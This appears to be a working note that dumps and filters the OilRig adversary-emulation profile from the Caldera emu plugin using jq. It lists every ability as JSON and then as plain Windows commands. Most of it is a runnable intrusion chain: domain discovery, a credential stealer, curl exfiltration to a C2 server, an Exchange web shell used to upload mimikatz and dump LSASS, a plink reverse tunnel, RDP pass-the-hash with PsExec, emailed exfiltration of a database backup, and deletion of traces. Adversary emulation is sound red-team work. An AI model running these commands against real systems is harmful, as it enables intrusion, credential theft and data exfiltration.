Adversary: OilRig
Sequence of commands
┌──(caldera-env)─(attacker㉿kali)-[~/…/caldera/plugins/emu/data]
└─$ jq '.[] | select(.adversary == "OilRig")' commands-output.json
{
"adversary": "OilRig",
"abilities": [
{
"ability_id": "ed2471a9-1eeb-4787-a5d8-61f66b278a50",
"platform": "windows",
"commands": {
"cmd": "cscript /nologo computername.vbs\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Information Discovery",
"attack_id": "T1082"
},
{
"ability_id": "88378065-bedf-46b9-a8b7-bc5897f4abcb",
"platform": "windows",
"commands": {
"cmd": "cscript /nologo username.vbs\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Owner/User Discovery",
"attack_id": "T1033"
},
{
"ability_id": "0386ef16-757e-425c-8355-88e5be40eb32",
"platform": "windows",
"commands": {
"cmd": "whoami"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Owner/User Discovery",
"attack_id": "T1033"
},
{
"ability_id": "a9861ea9-4f9a-46c9-ba60-15a02806dfdc",
"platform": "windows",
"commands": {
"cmd": "hostname"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Information Discovery",
"attack_id": "T1082"
},
{
"ability_id": "628e8ad3-14af-4670-b797-bcf175a42842",
"platform": "windows",
"commands": {
"cmd": "ipconfig /all"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Configuration Discovery",
"attack_id": "T1016"
},
{
"ability_id": "13d5ab62-c05a-4d25-bd8f-e3b27a5be611",
"platform": "windows",
"commands": {
"cmd": "net user /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Account Discovery: Domain Account",
"attack_id": "T1087.002"
},
{
"ability_id": "e0b534a6-bff3-4964-8f7b-863ddee224b0",
"platform": "windows",
"commands": {
"cmd": "net group /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "3d450711-1062-4276-8bff-bb78ec4f4519",
"platform": "windows",
"commands": {
"cmd": "net group \"domain admins\" /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "29c018ed-eb3e-4ddb-90ec-ba3d928a00e8",
"platform": "windows",
"commands": {
"cmd": "net group \"Exchange Trusted Subsystem\" /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "41ce9dd8-dc9f-4fba-8ce9-9ef5aaee3d19",
"platform": "windows",
"commands": {
"cmd": "net accounts /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Password Policy Discovery",
"attack_id": "T1021"
},
{
"ability_id": "821fd81e-2086-4ea6-b792-fb9e044e2323",
"platform": "windows",
"commands": {
"cmd": "net user"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Account Discovery: Local Account",
"attack_id": "T1087.001"
},
{
"ability_id": "ae4e4c08-82cb-4a17-a873-660f851a1a38",
"platform": "windows",
"commands": {
"cmd": "net localgroup administrators"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Local Groups",
"attack_id": "T1069.001"
},
{
"ability_id": "cb8e9faa-ac00-48d8-a359-88044a2c0252",
"platform": "windows",
"commands": {
"cmd": "netstat -na"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Connections Discovery",
"attack_id": "T1049"
},
{
"ability_id": "de39f574-f6cc-4026-973e-c5370b36220b",
"platform": "windows",
"commands": {
"cmd": "tasklist"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Process Discovery",
"attack_id": "T1057"
},
{
"ability_id": "e6eb7d18-606e-4889-8924-f75cafa92811",
"platform": "windows",
"commands": {
"cmd": "sc query"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Service Discovery",
"attack_id": "T1007"
},
{
"ability_id": "178bb431-4eaf-43b1-922c-f484ab54bbee",
"platform": "windows",
"commands": {
"cmd": "systeminfo"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Information Discovery",
"attack_id": "T1082"
},
{
"ability_id": "09502b3c-7541-4c11-92a9-f55e683a6355",
"platform": "windows",
"commands": {
"cmd": "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\""
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Query Registry",
"attack_id": "T1012"
},
{
"ability_id": "7971246d-1392-411e-a803-a7946cf9e4d2",
"platform": "windows",
"commands": {
"cmd": "net user #{initial.target.user} /domain\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Account Discovery: Domain Account",
"attack_id": "T1087.002"
},
{
"ability_id": "6a7b4ba0-a9bb-451d-ba9f-d3a2e8a82ffe",
"platform": "windows",
"commands": {
"cmd": "net group \"SQL Admins\" /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "f9f1bd68-ec0a-47e7-8645-210844190d92",
"platform": "windows",
"commands": {
"cmd": "nslookup #{second.target.host}\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Remote System Discovery",
"attack_id": "T1018"
},
{
"ability_id": "a23fb84f-dfb7-4d07-a6ec-0352ae983651",
"platform": "windows",
"commands": {
"cmd": "C:\\Users\\#{initial.target.user}\\AppData\\local\\SystemFailureReporter\\b.exe\n"
},
"privilege": "Unknown",
"tactic": "credential-access",
"technique": "Credentials from Password Stores: Windows Credential Manager",
"attack_id": "T1555.004"
},
{
"ability_id": "021245dd-c0be-4900-bd6c-1c680f00a237",
"platform": "windows",
"commands": {
"cmd": "curl -F \"data=@C:\\Users\\#{initial.target.user}\\AppData\\Roaming\\fsociety.dat\" --header \"X-Request-ID: #{initial.target.user}-#{paw}\" #{server}/file/upload\n"
},
"privilege": "Unknown",
"tactic": "exfiltration",
"technique": "Exfiltration Over C2 Channel",
"attack_id": "T1041"
},
{
"ability_id": "2f3be960-5c00-4f03-a9c2-da09c31d38d9",
"platform": "windows",
"commands": {
"cmd": "copy C:\\Users\\#{initial.target.user}\\AppData\\Local\\SystemFailureReporter\\contact.aspx C:\\Users\\Public\\contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "7aaecfb7-a1eb-477c-8d53-ab3009389623",
"platform": "windows",
"commands": {
"cmd": "copy C:\\Users\\Public\\contact.aspx \"\\\\#{second.target.ip}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\exchweb\\ews\\\"\n"
},
"privilege": "Unknown",
"tactic": "persistence",
"technique": "Server Software Component: Web Shell",
"attack_id": "T1505.003"
},
{
"ability_id": "5f7dc4b3-1287-4a25-b0b0-b6e73756cc11",
"platform": "windows",
"commands": {
"cmd": "attrib +h \"\\\\#{second.target.ip}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\exchweb\\ews\\contact.aspx\""
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Hide Artifacts: Hidden Files & Directories",
"attack_id": "T1082"
},
{
"ability_id": "87d3322b-a435-47b5-9f97-a8db4f86dad5",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=whoami\" https://#{second.target.ip}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Owner/User Discovery",
"attack_id": "T1033"
},
{
"ability_id": "48927544-5a18-11ed-9b6a-0242ac120002",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=ipconfig /all\" https://#{second.target.ip}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Configuration Discovery",
"attack_id": "T1016"
},
{
"ability_id": "5c279562-a004-4d9c-9ec6-a7dc4997f699",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=netstat -an\" https://#{second.target.ip}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Connections Discovery",
"attack_id": "T1049"
},
{
"ability_id": "f96e8195-8b0f-4b87-bdce-748dfda2861f",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -F \"upl=f1\" -F 'sav=C:\\Windows\\temp\\' -F \"vir=false\" -F \"nen=m64.exe\" -F 'f1=@m64.exe' https://#{second.target.ip}/EWS/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "f01e86f9-0b66-4191-beee-324c380690df",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=C:\\Windows\\Temp\\m64.exe privilege::debug sekurlsa::logonPasswords exit 1> C:\\Windows\\Temp\\01.txt\" https://#{second.target.ip}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "credential-access",
"technique": "OS Credential Dumping: LSASS Memory",
"attack_id": "T1003.001"
},
{
"ability_id": "845d36f1-13b6-4d42-a384-aa2f4af9bc27",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -o 01.txt --data 'don=c:\\windows\\temp\\01.txt' https://#{second.target.ip}/EWS/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "exfiltration",
"technique": "Exfiltration Over C2 Channel",
"attack_id": "T1041"
},
{
"ability_id": "6482ba12-fa47-409c-bab8-704de6475e38",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST --data \"pro=cmd.exe\" --data \"cmd=del C:\\windows\\temp\\01.txt C:\\windows\\temp\\m64.exe\" https://#{second.target.ip}/EWS/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
},
{
"ability_id": "f3df5a83-2a5a-4277-8763-8fb51032d3fc",
"platform": "windows",
"commands": {
"cmd": "copy C:\\Users\\#{initial.target.user}\\AppData\\Local\\SystemFailureReporter\\plink.exe C:\\Users\\Public\\Downloads\\plink.exe\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "212995b5-acfc-404b-b3a9-a19cc0afa9a5",
"platform": "windows",
"commands": {
"proc": "exec-background C:\\Users\\Public\\Downloads\\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw \"#{caldera.user.password}\" #{caldera.server.ip}\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Protocol Tunneling",
"attack_id": "T1572"
},
{
"ability_id": "dc2efbdd-3ab4-44a0-9839-385540b8a8cc",
"platform": "linux",
"commands": {
"proc": "exec-background xfreerdp /u:'#{network.domain.name}\\#{initial.target.user}' /p:'#{initial.target.password}' /v:localhost:13389 /cert-ignore\n"
},
"privilege": "Unknown",
"tactic": "lateral-movement",
"technique": "Remote Services: Remote Desktop Protocol",
"attack_id": "T1021.001"
},
{
"ability_id": "5cb977ae-87c8-450f-b016-f414b42ba60f",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -F \"upl=f1\" -F 'sav=C:\\Windows\\System32' -F \"vir=false\" -F \"nen=ps.exe\" -F 'f1=@PsExec.exe' https://#{second.target.host}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "d5b83af2-b79e-438d-acfc-2641282df698",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -F \"upl=f1\" -F 'sav=C:\\Windows\\Temp' -F \"vir=false\" -F \"nen=Nt.dat\" -F 'f1=@RDAT.exe' https://#{second.target.host}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "98279c81-d5a0-4ec4-9d40-a6e87d1f9bd2",
"platform": "linux",
"commands": {
"sh": "curl -s --http1.1 --ntlm -u '#{network.domain.name}\\#{initial.target.user}:#{initial.target.password}' -k -X POST -F \"upl=f1\" -F 'sav=C:\\Windows\\System32' -F \"vir=false\" -F \"nen=mom64.exe\" -F 'f1=@m64.exe' https://#{second.target.host}/ews/contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "44073aa3-70e9-4a48-86b7-c25b6f29c25c",
"platform": "linux",
"commands": {
"sh": "sleep 5;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nxdotool key --window \"$rdp_window\" Super_L;\nsleep 5; \nxdotool windowactivate --sync \"$rdp_window\" type --delay 200 \"cmd\";\nsleep 3; \nxdotool key --window \"$rdp_window\" Ctrl+Shift+Return;\nsleep 3; \nxdotool key --window \"$rdp_window\" Tab Tab;\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'C:\\Windows\\System32\\mom64.exe \"privilege::debug\" \"sekurlsa::pth /user:#{second.target.user} /domain:#{network.domain.name} /ntlm:#{second.target.ntlm}\"';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'copy C:\\Windows\\Temp\\Nt.dat \\\\#{third.target.ip}\\C$\\ProgramData\\';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'C:\\Windows\\System32\\ps.exe \\\\#{third.target.ip} cmd.exe';\nxdotool key --window \"$rdp_window\" Return;\nsleep 5;\n"
},
"privilege": "Unknown",
"tactic": "execution",
"technique": "System Services: Service Execution",
"attack_id": "T1569.002"
},
{
"ability_id": "f1f34439-ca0d-4fe7-99af-a198a29b6a3e",
"platform": "linux",
"commands": {
"sh": "sleep 3;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nsleep 3; \nxdotool type --window \"$rdp_window\" 'dir \"C:\\Program Files\\Microsoft SQL Server\\\"';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'dir \"C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Backup\\\"';\nxdotool key --window \"$rdp_window\" Return;\nsleep 4;\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "File and Directory Discovery",
"attack_id": "T1083"
},
{
"ability_id": "885c14a2-bc56-4176-8671-4cb25489ae39",
"platform": "linux",
"commands": {
"sh": "sleep 2;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nsleep 3; \nxdotool type --window \"$rdp_window\" 'mkdir C:\\Programdata\\Vmware';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'move C:\\Programdata\\Nt.dat C:\\Programdata\\Vmware\\VMware.exe';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'cd \"C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Backup\\\"';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'C:\\ProgramData\\Vmware\\VMware.exe --path=\"sitedata_db.bak\" --to=\"#{exfil.target.email}\" --from=\"#{initial.target.user}@#{network.domain.name}\" --server=\"#{second.target.ip}\" --password='#{initial.target.password}' --chunksize=\"200000\"';\nsleep 1; \nxdotool key --window \"$rdp_window\" Return;\nsleep 15;\n"
},
"privilege": "Unknown",
"tactic": "exfiltration",
"technique": "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol",
"attack_id": "T1048.003"
},
{
"ability_id": "0c5cf9e2-3152-4b4c-9629-2ed7a00da09d",
"platform": "linux",
"commands": {
"sh": "sleep 3;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool search --pid \"$rdp_pid\");\nsleep 3; \nxdotool type --window \"$rdp_window\" 'del C:\\ProgramData\\VMware\\VMware.exe';\nsleep 3; \nxdotool key --window \"$rdp_window\" Return;\nsleep 3; \nxdotool type --window \"$rdp_window\" 'rmdir C:\\ProgramData\\VMware';\nsleep 3; \nxdotool key --window \"$rdp_window\" Return;\nsleep 1;\nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 1;\nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 2;\nxdotool type --window \"$rdp_window\" 'del C:\\Windows\\System32\\mom64.exe C:\\Windows\\temp\\Nt.dat C:\\Windows\\System32\\ps.exe';\nxdotool key --window \"$rdp_window\" Return;\nsleep 2; \nxdotool type --window \"$rdp_window\" 'exit';\nxdotool key --window \"$rdp_window\" Return;\nsleep 2;\n\nkill $(ps aux | grep \"sshd: #{caldera.user.name}\" | grep -v priv | grep -v grep | awk '{print $2}')\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
},
{
"ability_id": "d9c9a941-c0e8-4eed-8cc3-6511ad5b9e15",
"platform": "windows",
"commands": {
"cmd": "del C:\\Users\\gosta\\AppData\\Roaming\\fsociety.dat C:\\Users\\Public\\Downloads\\plink.exe;\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
},
{
"ability_id": "16767c68-a865-46af-a0e4-ff8d742efc3f",
"platform": "windows",
"commands": {
"cmd": "curl -s -H \"KEY:#{server.api.key}\" -H \"Content-Type: application/json\" -X PATCH http://#{caldera.server.ip}:8888/api/v2/agents/#{paw} -d \"{\\\"watchdog\\\":1}\"\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
}
]
}
Filter by platform windows
We filter all abilities by .platform == "windows":
jq '.[] | select(.adversary == "OilRig") | .abilities |= map(select(.platform == "windows"))' commands-output.json
We obtain:
{
"adversary": "OilRig",
"abilities": [
{
"ability_id": "ed2471a9-1eeb-4787-a5d8-61f66b278a50",
"platform": "windows",
"commands": {
"cmd": "cscript /nologo computername.vbs\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Information Discovery",
"attack_id": "T1082"
},
{
"ability_id": "88378065-bedf-46b9-a8b7-bc5897f4abcb",
"platform": "windows",
"commands": {
"cmd": "cscript /nologo username.vbs\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Owner/User Discovery",
"attack_id": "T1033"
},
{
"ability_id": "0386ef16-757e-425c-8355-88e5be40eb32",
"platform": "windows",
"commands": {
"cmd": "whoami"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Owner/User Discovery",
"attack_id": "T1033"
},
{
"ability_id": "a9861ea9-4f9a-46c9-ba60-15a02806dfdc",
"platform": "windows",
"commands": {
"cmd": "hostname"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Information Discovery",
"attack_id": "T1082"
},
{
"ability_id": "628e8ad3-14af-4670-b797-bcf175a42842",
"platform": "windows",
"commands": {
"cmd": "ipconfig /all"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Configuration Discovery",
"attack_id": "T1016"
},
{
"ability_id": "13d5ab62-c05a-4d25-bd8f-e3b27a5be611",
"platform": "windows",
"commands": {
"cmd": "net user /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Account Discovery: Domain Account",
"attack_id": "T1087.002"
},
{
"ability_id": "e0b534a6-bff3-4964-8f7b-863ddee224b0",
"platform": "windows",
"commands": {
"cmd": "net group /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "3d450711-1062-4276-8bff-bb78ec4f4519",
"platform": "windows",
"commands": {
"cmd": "net group \"domain admins\" /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "29c018ed-eb3e-4ddb-90ec-ba3d928a00e8",
"platform": "windows",
"commands": {
"cmd": "net group \"Exchange Trusted Subsystem\" /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "41ce9dd8-dc9f-4fba-8ce9-9ef5aaee3d19",
"platform": "windows",
"commands": {
"cmd": "net accounts /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Password Policy Discovery",
"attack_id": "T1021"
},
{
"ability_id": "821fd81e-2086-4ea6-b792-fb9e044e2323",
"platform": "windows",
"commands": {
"cmd": "net user"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Account Discovery: Local Account",
"attack_id": "T1087.001"
},
{
"ability_id": "ae4e4c08-82cb-4a17-a873-660f851a1a38",
"platform": "windows",
"commands": {
"cmd": "net localgroup administrators"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Local Groups",
"attack_id": "T1069.001"
},
{
"ability_id": "cb8e9faa-ac00-48d8-a359-88044a2c0252",
"platform": "windows",
"commands": {
"cmd": "netstat -na"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Network Connections Discovery",
"attack_id": "T1049"
},
{
"ability_id": "de39f574-f6cc-4026-973e-c5370b36220b",
"platform": "windows",
"commands": {
"cmd": "tasklist"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Process Discovery",
"attack_id": "T1057"
},
{
"ability_id": "e6eb7d18-606e-4889-8924-f75cafa92811",
"platform": "windows",
"commands": {
"cmd": "sc query"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Service Discovery",
"attack_id": "T1007"
},
{
"ability_id": "178bb431-4eaf-43b1-922c-f484ab54bbee",
"platform": "windows",
"commands": {
"cmd": "systeminfo"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "System Information Discovery",
"attack_id": "T1082"
},
{
"ability_id": "09502b3c-7541-4c11-92a9-f55e683a6355",
"platform": "windows",
"commands": {
"cmd": "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\""
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Query Registry",
"attack_id": "T1012"
},
{
"ability_id": "7971246d-1392-411e-a803-a7946cf9e4d2",
"platform": "windows",
"commands": {
"cmd": "net user #{initial.target.user} /domain\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Account Discovery: Domain Account",
"attack_id": "T1087.002"
},
{
"ability_id": "6a7b4ba0-a9bb-451d-ba9f-d3a2e8a82ffe",
"platform": "windows",
"commands": {
"cmd": "net group \"SQL Admins\" /domain"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Permission Groups Discovery: Domain Groups",
"attack_id": "T1069.002"
},
{
"ability_id": "f9f1bd68-ec0a-47e7-8645-210844190d92",
"platform": "windows",
"commands": {
"cmd": "nslookup #{second.target.host}\n"
},
"privilege": "Unknown",
"tactic": "discovery",
"technique": "Remote System Discovery",
"attack_id": "T1018"
},
{
"ability_id": "a23fb84f-dfb7-4d07-a6ec-0352ae983651",
"platform": "windows",
"commands": {
"cmd": "C:\\Users\\#{initial.target.user}\\AppData\\local\\SystemFailureReporter\\b.exe\n"
},
"privilege": "Unknown",
"tactic": "credential-access",
"technique": "Credentials from Password Stores: Windows Credential Manager",
"attack_id": "T1555.004"
},
{
"ability_id": "021245dd-c0be-4900-bd6c-1c680f00a237",
"platform": "windows",
"commands": {
"cmd": "curl -F \"data=@C:\\Users\\#{initial.target.user}\\AppData\\Roaming\\fsociety.dat\" --header \"X-Request-ID: #{initial.target.user}-#{paw}\" #{server}/file/upload\n"
},
"privilege": "Unknown",
"tactic": "exfiltration",
"technique": "Exfiltration Over C2 Channel",
"attack_id": "T1041"
},
{
"ability_id": "2f3be960-5c00-4f03-a9c2-da09c31d38d9",
"platform": "windows",
"commands": {
"cmd": "copy C:\\Users\\#{initial.target.user}\\AppData\\Local\\SystemFailureReporter\\contact.aspx C:\\Users\\Public\\contact.aspx\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "7aaecfb7-a1eb-477c-8d53-ab3009389623",
"platform": "windows",
"commands": {
"cmd": "copy C:\\Users\\Public\\contact.aspx \"\\\\#{second.target.ip}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\exchweb\\ews\\\"\n"
},
"privilege": "Unknown",
"tactic": "persistence",
"technique": "Server Software Component: Web Shell",
"attack_id": "T1505.003"
},
{
"ability_id": "5f7dc4b3-1287-4a25-b0b0-b6e73756cc11",
"platform": "windows",
"commands": {
"cmd": "attrib +h \"\\\\#{second.target.ip}\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\exchweb\\ews\\contact.aspx\""
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Hide Artifacts: Hidden Files & Directories",
"attack_id": "T1082"
},
{
"ability_id": "f3df5a83-2a5a-4277-8763-8fb51032d3fc",
"platform": "windows",
"commands": {
"cmd": "copy C:\\Users\\#{initial.target.user}\\AppData\\Local\\SystemFailureReporter\\plink.exe C:\\Users\\Public\\Downloads\\plink.exe\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Ingress Tool Transfer",
"attack_id": "T1105"
},
{
"ability_id": "212995b5-acfc-404b-b3a9-a19cc0afa9a5",
"platform": "windows",
"commands": {
"proc": "exec-background C:\\Users\\Public\\Downloads\\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw \"#{caldera.user.password}\" #{caldera.server.ip}\n"
},
"privilege": "Unknown",
"tactic": "command-and-control",
"technique": "Protocol Tunneling",
"attack_id": "T1572"
},
{
"ability_id": "d9c9a941-c0e8-4eed-8cc3-6511ad5b9e15",
"platform": "windows",
"commands": {
"cmd": "del C:\\Users\\gosta\\AppData\\Roaming\\fsociety.dat C:\\Users\\Public\\Downloads\\plink.exe;\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
},
{
"ability_id": "16767c68-a865-46af-a0e4-ff8d742efc3f",
"platform": "windows",
"commands": {
"cmd": "curl -s -H \"KEY:#{server.api.key}\" -H \"Content-Type: application/json\" -X PATCH http://#{caldera.server.ip}:8888/api/v2/agents/#{paw} -d \"{\\\"watchdog\\\":1}\"\n"
},
"privilege": "Unknown",
"tactic": "defense-evasion",
"technique": "Indicator Removal on Host: File Deletion",
"attack_id": "T1070.004"
}
]
}
Windows Commands extracted
- For adversary OilRig, extracting the commands executed in every ability:
cat oilrig_windows_commands.txt
cscript /nologo computername.vbs
cscript /nologo username.vbs
whoami
hostname
ipconfig /all
net user /domain
net group /domain
net group "domain admins" /domain
net group "Exchange Trusted Subsystem" /domain
net accounts /domain
net user
net localgroup administrators
netstat -na
tasklist
sc query
systeminfo
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
net user #{initial.target.user} /domain
net group "SQL Admins" /domain
nslookup #{second.target.host}
C:\Users\#{initial.target.user}\AppData\local\SystemFailureReporter\b.exe
curl -F "data=@C:\Users\#{initial.target.user}\AppData\Roaming\fsociety.dat" --header "X-Request-ID: #{initial.target.user}-#{paw}" #{server}/file/upload
copy C:\Users\#{initial.target.user}\AppData\Local\SystemFailureReporter\contact.aspx C:\Users\Public\contact.aspx
copy C:\Users\Public\contact.aspx "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\"
attrib +h "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\contact.aspx"
copy C:\Users\#{initial.target.user}\AppData\Local\SystemFailureReporter\plink.exe C:\Users\Public\Downloads\plink.exe
exec-background C:\Users\Public\Downloads\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw "#{caldera.user.password}" #{caldera.server.ip}
del C:\Users\gosta\AppData\Roaming\fsociety.dat C:\Users\Public\Downloads\plink.exe;
